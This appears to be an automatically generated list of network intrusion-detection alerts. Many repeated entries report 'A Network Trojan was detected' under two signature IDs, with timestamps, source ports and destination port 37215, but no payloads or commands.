              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972161
              SID:2835222
              Source Port:34376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247634
              SID:2835222
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597729
              SID:2829579
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303206
              SID:2835222
              Source Port:39738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967139
              SID:2835222
              Source Port:35290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572743
              SID:2829579
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049728
              SID:2829579
              Source Port:55338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621579
              SID:2835222
              Source Port:44570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186012
              SID:2829579
              Source Port:58932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827985
              SID:2829579
              Source Port:54550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278139
              SID:2835222
              Source Port:59706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374110
              SID:2829579
              Source Port:60072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502361
              SID:2835222
              Source Port:37636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491911
              SID:2835222
              Source Port:51590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663631
              SID:2829579
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119001
              SID:2829579
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492993
              SID:2829579
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154337
              SID:2835222
              Source Port:43162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204421
              SID:2829579
              Source Port:53054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118489
              SID:2829579
              Source Port:35472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537236
              SID:2835222
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538053
              SID:2835222
              Source Port:59788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148997
              SID:2835222
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163521
              SID:2835222
              Source Port:56246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456729
              SID:2835222
              Source Port:42362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817904
              SID:2835222
              Source Port:48896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235434
              SID:2829579
              Source Port:47268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526927
              SID:2829579
              Source Port:45670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302919
              SID:2829579
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573907
              SID:2835222
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663530
              SID:2829579
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724198
              SID:2835222
              Source Port:34842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529813
              SID:2835222
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506521
              SID:2835222
              Source Port:43024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207614
              SID:2835222
              Source Port:44300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797291
              SID:2829579
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186443
              SID:2829579
              Source Port:60012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494784
              SID:2829579
              Source Port:39100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801646
              SID:2829579
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200693
              SID:2835222
              Source Port:58802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547030
              SID:2829579
              Source Port:35474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878345
              SID:2829579
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460526
              SID:2835222
              Source Port:46892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872352
              SID:2835222
              Source Port:47096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167346
              SID:2835222
              Source Port:39924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642167
              SID:2829579
              Source Port:60198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363265
              SID:2829579
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397723
              SID:2835222
              Source Port:39010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111187
              SID:2835222
              Source Port:47654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574501
              SID:2829579
              Source Port:43104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404437
              SID:2835222
              Source Port:44722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502742
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573442
              SID:2829579
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493194
              SID:2835222
              Source Port:41170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866431
              SID:2835222
              Source Port:45180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397908
              SID:2835222
              Source Port:50138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817641
              SID:2829579
              Source Port:54912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347806
              SID:2835222
              Source Port:60790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549297
              SID:2835222
              Source Port:50644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445061
              SID:2835222
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594496
              SID:2835222
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885961
              SID:2835222
              Source Port:37194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358595
              SID:2835222
              Source Port:42856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965803
              SID:2835222
              Source Port:59114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661365
              SID:2835222
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671685
              SID:2835222
              Source Port:33472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547884
              SID:2835222
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234685
              SID:2829579
              Source Port:37684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501600
              SID:2835222
              Source Port:37882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747681
              SID:2835222
              Source Port:55880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482340
              SID:2829579
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428240
              SID:2829579
              Source Port:47034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803113
              SID:2829579
              Source Port:47126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433613
              SID:2829579
              Source Port:60480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432239
              SID:2835222
              Source Port:53892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127208
              SID:2829579
              Source Port:60036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080382
              SID:2835222
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435347
              SID:2829579
              Source Port:32844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044533
              SID:2829579
              Source Port:34892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300386
              SID:2835222
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122749
              SID:2835222
              Source Port:55504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759934
              SID:2829579
              Source Port:42790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062767
              SID:2835222
              Source Port:53732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600206
              SID:2835222
              Source Port:49454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411267
              SID:2829579
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638562
              SID:2835222
              Source Port:57070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460432
              SID:2835222
              Source Port:45830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531942
              SID:2835222
              Source Port:60022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186980
              SID:2835222
              Source Port:48164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235253
              SID:2835222
              Source Port:44106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062222
              SID:2829579
              Source Port:52980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763929
              SID:2829579
              Source Port:51062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160356
              SID:2829579
              Source Port:42806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230966
              SID:2829579
              Source Port:56110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513409
              SID:2835222
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430471
              SID:2835222
              Source Port:54676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576495
              SID:2835222
              Source Port:57366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.580579
              SID:2835222
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591727
              SID:2829579
              Source Port:45810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485292
              SID:2835222
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604586
              SID:2835222
              Source Port:50812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347046
              SID:2835222
              Source Port:50830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420886
              SID:2835222
              Source Port:35092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725144
              SID:2835222
              Source Port:33314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079844
              SID:2835222
              Source Port:32818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603829
              SID:2835222
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101328
              SID:2835222
              Source Port:39624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245816
              SID:2835222
              Source Port:41480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573539
              SID:2835222
              Source Port:47876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165038
              SID:2835222
              Source Port:53874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572407
              SID:2829579
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517195
              SID:2835222
              Source Port:42632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100438
              SID:2829579
              Source Port:36464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382764
              SID:2829579
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333856
              SID:2829579
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923627
              SID:2835222
              Source Port:57842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117931
              SID:2829579
              Source Port:44958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979704
              SID:2835222
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202854
              SID:2829579
              Source Port:51594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918464
              SID:2829579
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482814
              SID:2835222
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637985
              SID:2829579
              Source Port:57898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198778
              SID:2835222
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127604
              SID:2829579
              Source Port:34568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859556
              SID:2829579
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860102
              SID:2829579
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329768
              SID:2835222
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404661
              SID:2835222
              Source Port:48298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411580
              SID:2835222
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602781
              SID:2829579
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100582
              SID:2829579
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397784
              SID:2835222
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478245
              SID:2829579
              Source Port:54952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368699
              SID:2835222
              Source Port:37206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582690
              SID:2835222
              Source Port:49162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309198
              SID:2829579
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121250
              SID:2829579
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264714
              SID:2835222
              Source Port:55132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480866
              SID:2829579
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796614
              SID:2835222
              Source Port:33986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432519
              SID:2829579
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642887
              SID:2829579
              Source Port:55038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163565
              SID:2835222
              Source Port:41442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246078
              SID:2829579
              Source Port:35084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040396
              SID:2829579
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594525
              SID:2835222
              Source Port:38140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491800
              SID:2829579
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548139
              SID:2835222
              Source Port:37834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2829579
              Source Port:45354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536882
              SID:2835222
              Source Port:33734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2835222
              Source Port:43278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536323
              SID:2835222
              Source Port:48822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692509
              SID:2829579
              Source Port:46456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625706
              SID:2835222
              Source Port:48186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689666
              SID:2835222
              Source Port:41934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493577
              SID:2829579
              Source Port:39312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396717
              SID:2829579
              Source Port:39204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300230
              SID:2829579
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100502
              SID:2835222
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976934
              SID:2829579
              Source Port:60550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341113
              SID:2835222
              Source Port:56822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340875
              SID:2835222
              Source Port:56562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923367
              SID:2829579
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153248
              SID:2835222
              Source Port:54070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232669
              SID:2835222
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361343
              SID:2829579
              Source Port:56374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572409
              SID:2829579
              Source Port:33772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530869
              SID:2829579
              Source Port:54374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822627
              SID:2829579
              Source Port:39276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866354
              SID:2835222
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.518870
              SID:2835222
              Source Port:38166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803124
              SID:2829579
              Source Port:47916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195272
              SID:2829579
              Source Port:43186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671801
              SID:2829579
              Source Port:48236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289210
              SID:2829579
              Source Port:33174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429856
              SID:2835222
              Source Port:54152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308722
              SID:2835222
              Source Port:59444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063001
              SID:2829579
              Source Port:51750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455349
              SID:2829579
              Source Port:45732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926454
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078724
              SID:2829579
              Source Port:50306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061511
              SID:2829579
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623793
              SID:2835222
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.815996
              SID:2829579
              Source Port:36958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538703
              SID:2829579
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358440
              SID:2835222
              Source Port:51554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685024
              SID:2829579
              Source Port:53030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115092
              SID:2829579
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705966
              SID:2835222
              Source Port:57942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763252
              SID:2835222
              Source Port:42938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875802
              SID:2829579
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100475
              SID:2835222
              Source Port:44130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187417
              SID:2835222
              Source Port:39984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918164
              SID:2829579
              Source Port:45528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537225
              SID:2829579
              Source Port:36904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480424
              SID:2829579
              Source Port:34000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368535
              SID:2829579
              Source Port:43666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
